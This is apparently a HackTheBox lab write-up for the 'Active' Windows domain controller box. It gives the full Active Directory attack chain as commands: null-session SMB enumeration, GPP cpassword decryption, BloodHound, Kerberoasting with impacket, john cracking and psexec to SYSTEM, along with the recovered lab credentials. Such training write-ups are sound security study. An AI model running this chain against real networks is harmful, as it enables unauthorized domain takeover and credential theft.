Box Info
| Platform | HackTheBox |
| Difficulty | Easy |
| OS | Windows Server 2008 R2 |
| Key Techniques | GPP Password Decryption, Kerberoasting, PsExec |
Attack Path Summary
SMB null session → Replication share has READ access → found Groups.xml with GPP-encrypted password → gpp-decrypt gave us SVC_TGS creds → BloodHound showed Administrator has an SPN → Kerberoasted Administrator → cracked with rockyou → psexec → Domain Admin.
First AD box ever. Full chain from zero creds to DA.
Enumeration
echo "10.129.3.112 active.htb" | sudo tee -a /etc/hosts
SMB — Null Session
nxc smb $ip -u '' -p '' --shares
# Replication share has READ access — this is basically SYSVOL
Replication share readable with null creds. That’s the starting point.
Foothold — GPP Passwords (Free Creds)
Browsed the Replication share and found the classic GPP attack path.
# Navigated to: Policies → Preferences → Groups → Groups.xml
# Found cpassword field + username: active.htb\SVC_TGS
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
# Result: GPPstillStandingStrong2k18
First creds: SVC_TGS:GPPstillStandingStrong2k18
The thing about GPP passwords — Microsoft published the AES key used to encrypt the cpassword field. So gpp-decrypt cracks it instantly. Is not even brute force, is just decryption with a known key. Free creds.
BloodHound
bloodhound-python -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -ns 10.129.3.112 -d active.htb -c All
# Found 5 users, 41 groups, 2 GPOs
# Uploaded JSON files to BloodHound CE at localhost:8080
BloodHound showed the Administrator account has an SPN set (active/CIFS:445). That means is Kerberoastable.
Privilege Escalation — Kerberoasting
Any authenticated domain user can request service tickets for accounts with SPNs. The ticket is encrypted with the account’s password hash — crack the ticket, crack the password.
impacket-GetUserSPNs active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.129.3.112 -request -outputfile kerberoast.txt
# Found: Administrator with SPN active/CIFS:445
# Got krb5tgs hash
john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Cracked: Ticketmaster1968
Domain Admin creds: Administrator:Ticketmaster1968
Shell as SYSTEM
impacket-psexec active.htb/Administrator:'Ticketmaster1968'@10.129.3.112
Done.
Credentials
| Username | Password | Source | Scope |
|---|---|---|---|
| SVC_TGS | GPPstillStandingStrong2k18 | GPP Groups.xml | Domain user |
| Administrator | Ticketmaster1968 | Kerberoasting | Domain Admin |
What I Learned
GPP passwords in SYSVOL/Replication shares — any domain user (or even null session) can read Group Policy Preferences XML files. The cpassword field uses a published AES key. Always check for this.
Kerberoasting — any authenticated user can request TGS tickets for accounts with SPNs. If the password is weak, you crack the ticket offline. The Administrator having an SPN was the kill shot here.
The eCPPTv3 AD chain works on real boxes: Setup → find creds (GPP) → BloodHound → Kerberoasting → crack → psexec → Domain Admin.
Pattern: “Null SMB access + SYSVOL/Replication share = check for GPP passwords immediately. Then BloodHound everything.”